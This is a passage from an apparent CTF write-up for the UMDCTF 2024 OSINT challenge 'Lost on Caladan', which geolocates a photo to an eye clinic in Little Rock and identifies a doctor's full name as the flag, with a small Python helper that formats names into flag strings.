<p>Both the parking lot layout and the white-on-dark-blue direction signs are similar to the ones in the challenge image.</p>

<p><img src="/assets/images/umdctf2024//image6.png" alt="image" /></p>

<p>Zooming in on Google Street View, we can select an intersection that fits our criteria of being near a large parking lot and a medical tower.</p>

<p><img src="/assets/images/umdctf2024//image7.png" alt="image" /></p>

<p>The beige building on the right is rather interesting, as it is across from a parking lot and matches the color of the building in the image.</p>

<p><img src="/assets/images/umdctf2024//image8.png" alt="image" /></p>

<p>Aha, we’ve reached our destination, where a minibus is parked out front and where the latest issues of Arkansas Money &amp; Politics are available.</p>

<p>The “Baptist Eye Center” is a surgical ophthalmology center affiliated with Baptist Health Medical Center - Little Rock. The doctors at this center should be the people we are looking for.</p>

<p>Heading over to <a href="https://doctor.webmd.com/practice/baptist-health-eye-and-surgery-center-9d3dc05a-da81-4601-a0eb-e564ea77205d/physicians/">WebMD</a>, we can see a list of ophthalmologists working at the center.</p>

<p><img src="/assets/images/umdctf2024//image-copy-9.png" alt="image" /></p>

<p>We took ‘best’ doctor literally and initially submitted flags containing the names of the highest-rated doctors, such as <code class="language-plaintext highlighter-rouge">UMDCTF{Christian_Cardell_Hester}</code>. It was not until after nearly 15 minutes of brute-forcing through all of the doctors’ names that we noticed the zero-star-rated “Dr. Sean Adonis Atreides.”</p>
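<p>For anyone who would rather not type every candidate by hand, here is a minimal sketch of how the flag strings could be generated from a list of names. The helper <code class="language-plaintext highlighter-rouge">to_flag</code> and the <code class="language-plaintext highlighter-rouge">doctors</code> list are hypothetical names made up for illustration (we did this manually during the CTF), and the sketch assumes the flag is simply the name parts joined by underscores inside <code class="language-plaintext highlighter-rouge">UMDCTF{}</code>.</p>

```python
# Hypothetical helper: turn a doctor's name into a candidate flag.
# Assumes the flag format is PREFIX{First_Middle_Last}.
def to_flag(full_name, prefix="UMDCTF"):
    # Drop periods (e.g. "Dr.") and split on whitespace.
    parts = full_name.replace(".", "").split()
    return prefix + "{" + "_".join(parts) + "}"


# Illustrative list; in practice this would hold every name on the listing.
doctors = [
    "Christian Cardell Hester",
    "Sean Adonis Atreides",
]

candidates = [to_flag(name) for name in doctors]

if __name__ == "__main__":
    for flag in candidates:
        print(flag)
```

<p>The script only builds the candidate strings. Submitting them is left manual on purpose, since hammering a scoreboard with automated guesses is usually against CTF rules.</p>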

<p><code class="language-plaintext highlighter-rouge">UMDCTF{Sean_Adonis_Atreides}</code> was unfortunately not accepted, as it was not his full name. We scrambled to find the doctor’s full name, and by searching the Oklahoma Board of Medical Licensure and Supervision, we found that it is “Sean Paul Adonis Atreides”.</p>

<p><img src="/assets/images/umdctf2024//image10.png" alt="image" /></p>

<h2 id="flag">Flag</h2>

<p><code class="language-plaintext highlighter-rouge">UMDCTF{Sean_Paul_Adonis_Atreides}</code></p>]]></content><author><name>frankuu</name></author><summary type="html"><![CDATA[Lost on Caladan [500] OSINT]]></summary></entry></feed>